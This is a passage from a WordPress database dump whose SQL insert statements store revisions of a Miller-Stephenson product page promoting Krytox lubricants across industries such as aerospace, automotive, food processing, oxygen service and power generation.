line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:43:52', '2016-09-28 19:43:52', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2126, 2, '2016-09-29 19:14:06', '2016-09-29 19:14:06', '&nbsp;\n<p style="text-align: center;"><span style="font-size: 140%;"><strong>Choose Your Industry</strong></span></p>\n[row col_style="dashed"]\n\n[col span="4" span__sm="12"]\n\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#automotive2">Automotive - Mechanical Systems</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#board">Box Board Corrugating</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#petro">Chemical and Petrochemical</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#elec">Electronics / Semiconductor</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#food">Food Processing</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#med">Medical Industry</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#metal">Metal Processing</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#oxy">Oxygen &amp; Reactive Gas Service</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#power">Power Generation</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#pulp">Pulp &amp; Paper</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#text">Textile</a>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<a href="#tire">Tire Mold</a>\n\n[/col]\n<a name="aerospace"></a>\n[/row]\n\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\n\n<span style="font-size: 110%;"><strong>Aerospace, Aviation, and National Defense</strong></span>\n<ul>\n 	<li><span style="font-size: 100%;">Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</span></li>\n 	<li><span style="font-size: 100%;">Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</span></li>\n</ul>\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\n<ul>\n 	<li>Low outgassing</li>\n 	<li>Wide temperature range</li>\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\n</ul>\nGeneral Applications\n<ul>\n 	<li>Bearings—all types</li>\n 	<li>Seals—valves and pumps</li>\n 	<li>O-rings—sealants, lubricants</li>\n</ul>\nAerospace-Specific Applications\n<ul>\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\n 	<li>Mechanical components—spline shafts, control linkages</li>\n</ul>\n<a name="automotive"></a>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<span style="font-size: 110%;"><strong>Automotive—Squeak and Rattle</strong></span>\n\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\n<a name="automotive2"></a>\n[ux_product_categories ids="37,46,96,97,98" number="10"]\n\n<span style="font-size: 110%;"><strong>Automotive—Mechanical Systems</strong></span>\n\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\n<ul>\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\n</ul>\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\n<ul>\n 	<li>A wide temperature range</li>\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\n</ul>\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\n\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\n<a name="petro"></a>\n[ux_product_categories ids="37,46,96,97,98" number="10"]\n\n<span style="font-size: 110%;"><strong>Chemical and Petrochemical</strong></span>\n\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\n<ul>\n 	<li>Extended equipment life</li>\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n 	<li>No ignition at pressures up to 350 bar</li>\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\n 	<li>BAM certification</li>\n</ul>\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\n<a name="board"></a>\n[ux_product_categories ids="36,38,34" number="10"]\n\n<span style="font-size: 110%;"><strong>Box Board Corrugating</strong></span>\n\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\n<ul>\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\n</ul>\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\n<ul>\n 	<li>ISO-9002 certified</li>\n 	<li>Long-term wear resistance</li>\n 	<li>Decreased wear and bearing failure</li>\n 	<li>Protection from rust and high-temperature corrosion</li>\n 	<li>No carbonization</li>\n 	<li>Superior lubricity</li>\n 	<li>Compatible with all metals, elastomers, and plastics</li>\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\n</ul>\n<a name="elec"></a>\n[ux_product_categories ids="46,96" number="10"]\n\n<span style="font-size: 110%;"><strong>Electronics/Semiconductor</strong></span>\n\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\n<ul>\n 	<li>Wet and dry vacuum pumps</li>\n 	<li>Vacuum system sealants</li>\n 	<li>Clean rooms</li>\n 	<li>Robotics</li>\n</ul>\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\n<ul>\n 	<li>Bearings</li>\n 	<li>Valves</li>\n 	<li>Seals</li>\n 	<li>O-rings</li>\n 	<li>Chains</li>\n 	<li>Compressors</li>\n 	<li>Gear boxes</li>\n 	<li>Mechanical pumps and other components</li>\n</ul>\n<a name="food"></a>\n\n[ux_product_categories ids="156,46,96" number="10"]\n\n<span style="font-size: 110%;"><strong>Food Processing</strong></span>\n\nKrytox lubricants for use in the food processing industry are:\n<ul>\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\n</ul>\nKrytox oils and greases offer unmatched stability and flexibility:\n<ul>\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n</ul>\n<a name="med"></a>\n[ux_product_categories ids="96,46,38,97" number="10"]\n\n<span style="font-size: 110%;"><strong>Medical Industry Equipment Applications </strong></span>\n\nIn medical applications, Krytox lubricants offer safety and efficacy:\n<ul>\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\n 	<li>Oxygen systems and respirators</li>\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\n</ul>\n<a name="metal"></a>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<span style="font-size: 110%;"><strong>Metal Processing </strong></span>\n\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\n<a name="oxy"></a>\n[ux_product_categories ids="40,115,116,123" number="10"]\n\n<span style="font-size: 110%;"><strong>Oxygen and Reactive Gas Service </strong></span>\n\nWhen working with reactive gas equipment, failure is not an option.\n\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\n\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\n<ul>\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n 	<li>No ignition at pressures up to 350 bar</li>\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\n</ul>\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\n\n<a name="power"></a>\n[ux_product_categories ids="36,38,115,116" number="10"]\n\n<span style="font-size: 110%;"><strong>Power Generation</strong></span>\n\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\n\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\n<ul>\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\n</ul>\n<a name="pulp"></a>\n\n[ux_product_categories ids="40,171,96,97" number="10"]\n\n<span style="font-size: 110%;"><strong>Pulp and Paper</strong></span>\n\nChoose the lubricant that can move pulp and paper productivity to new levels.\n\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\n<ul>\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\n</ul>\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\n\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\n<ul>\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\n</ul>\n<a name="text"></a>\n[ux_product_categories ids="46,96" number="10"]\n\n<span style="font-size: 110%;"><strong>Textile</strong></span>\n\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\n\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\n<ul>\n 	<li>ISO-9002 certified</li>\n 	<li>No oxidation or degradation</li>\n 	<li>Protection from rust and high-temperature corrosion</li>\n 	<li>Superior lubricity</li>\n 	<li>Compatible with all metals, elastomers, and plastics</li>\n 	<li>Compatible with oxygen and chlorine</li>\n</ul>\n<a name="tire"></a>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<span style="font-size: 110%;"><strong>Tire Mold</strong></span>\n\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\n<ul>\n 	<li>High temperature performance</li>\n 	<li>Extended re-application interval</li>\n 	<li>Excellent adhesion</li>\n 	<li>High hydrolytic stability</li>\n 	<li>Elimination of carbon residue build-up on molds</li>\n</ul>\n[ux_product_categories ids="143" number="10"]\n\n&nbsp;\n\nTo see our entire line of Krytox products please visit: <a href="https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/">https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/</a>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-autosave-v1', '', '', '2016-09-29 19:14:06', '2016-09-29 19:14:06', '', 2058, 'https://www.miller-stephenson.com/2058-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2127, 2, '2016-09-28 19:51:40', '2016-09-28 19:51:40', '<p style="text-align: center;"><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n<br><br>\r\n<br><br>\r\n<br><br>\r\n<br><br>\r\n<br><br>\r\n\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As 